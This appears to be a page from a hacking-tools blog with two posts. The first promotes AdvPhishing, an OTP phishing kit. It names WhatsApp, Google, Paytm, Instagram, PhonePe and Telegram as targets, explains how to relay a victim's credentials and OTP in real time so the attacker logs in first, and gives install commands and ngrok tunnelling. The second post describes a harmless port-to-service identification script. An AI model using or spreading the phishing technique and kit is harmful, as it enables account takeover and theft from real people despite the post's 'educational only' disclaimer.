AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING

October 4, 2020, 4:30 am

≫ Next: OFFPORT_KILLER - This Tool Aims At Automating The Identification Of Potential Service Running Behind Ports Identified Manually Either Through Manual Scan Or Services Running Locally

≪ Previous: Timewarrior - Commandline Time Reporting

This Is Advance Phishing Tool! OTP PHISHING

SPECIAL OTP BYPASS VIDEO WORKED

Social Media Hack	Link
Installation Termux	https://www.youtube.com/watch?v=LO3hX1lLBjI
Whatsapp OTP	https://www.youtube.com/watch?v=pyB63ym3QYs
Google OTP	https://www.youtube.com/watch?v=MhSb4My1lZo
Paytm OTP	https://www.youtube.com/watch?v=3TB_sISTw9U
Instagram OTP	https://www.youtube.com/watch?v=VmkV1rrw2-w
Phone Pay OTP	https://www.youtube.com/watch?v=ZgaoLubKBBo
Telegram OTP	https://www.youtube.com/watch?v=BhGyGkIDhO0

TECHNIQUE

When victim enter his credentials, you need to go to original website and use those credentials to send real OTP to victim. Once he enter that OTP such OTP will also be there with you and you will be allowed to login the account before him.

SCREENSHOT ( KALI )

INSTALLATION [ TERMUX APP --ANDROID ]

git clone https://github.com/Ignitetch/AdvPhishing.git
cd AdvPhishing/
chmod 777 *
./Android-Setup.sh
./AdvPhishing.sh

INSTALLATION [ KALI ]

git clone https://github.com/Ignitetch/AdvPhishing.git
cd AdvPhishing/
chmod 777 *
./Linux-Setup.sh
./AdvPhishing.sh

AVAILABLE TUNNELLING OPTIONS

LOCALHOST
NGROK (https://ngrok.com/)

TESTED ON FOLLOWING:-

Kali Linux - 2020.1a (version)
Parrot OS - Rolling Edition (version)
Ubuntu - 18.04 (version)
Arch Linux
Termux App

PREREQUISITES

sudo - [ MUST ]
php
apache2
ngrok Token

LANGUAGE

Bash Script

Upcoming Contribution

Royal Hackers

Contact For Contribute & Issues

                                  EMAIL FOR ISSUES AND CONTRIBUTE : sg5479845@gmail.com

DISCLAIMER

                                   TO BE USED FOR EDUCATIONAL PURPOSES ONLY

The use of the Adv-Phishing is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.

Download AdvPhishing

↧

OFFPORT_KILLER - This Tool Aims At Automating The Identification Of Potential Service Running Behind Ports Identified Manually Either Through Manual Scan Or Services Running Locally

October 4, 2020, 1:30 pm

≫ Next: SCREEN_KILLER - Tool To Track Progress For Reporting (Capture Screenshot, Commands And Outputs) During Pentest Engagement And OSCP

≪ Previous: AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING

#Manual Port Scanning #Enumerate Potential Service

If you like the tool and for my personal motivation so as to develop other tools please a +1 star *

INTRO

This tool aims at automating the identification of potential service running behind ports identified manually or on services running locally only.

The tool is useful:

1. when nmap or any scanning tool is not available and in the situation during which you did a manual port scanning and then want to identify the services running behind the identified ports and

2.also if you have been able to identify services running locally via (netstat, running processes SNMP or else).

Several databases are used such as the one from NMAP, IANA and linux machines.

The tool can be used by pentesters, system admins, CTF players, students, System Auditors and trolls :).

Usage

Example

./OFFPORT_KILLER.sh -i inputfile.txt -r report.txt -e /tmp/

Arguments

-i : input file (format IP:PORT)
-r : report name (save the output)
-h : help

Steps

Step 1: Peform a manual port scanning (using nc, tcpdump or whatever) or identify services running locally
Step 2: Create a file with format IP:PORT (where IP is the target IP address and PORT is a port identified).
Step 3: Run the tool with the file created using the argument -i

Note: Create an entry for each port, several IP can be input in the file.

inputfile.txt

192.168.1.12:1830
192.168.1.12:7738
192.168.1.14:22
192.168.1.14:7738
192.168.1.15:3465

Output

Read output

To read output while keeping the aspect (color), especially when cat is not adequate and the output is too long.

less -R report.txt

Disclaimer

This script is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (TH3xACE) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of the script is not my responsibility.

Download OFFPORT_KILLER

↧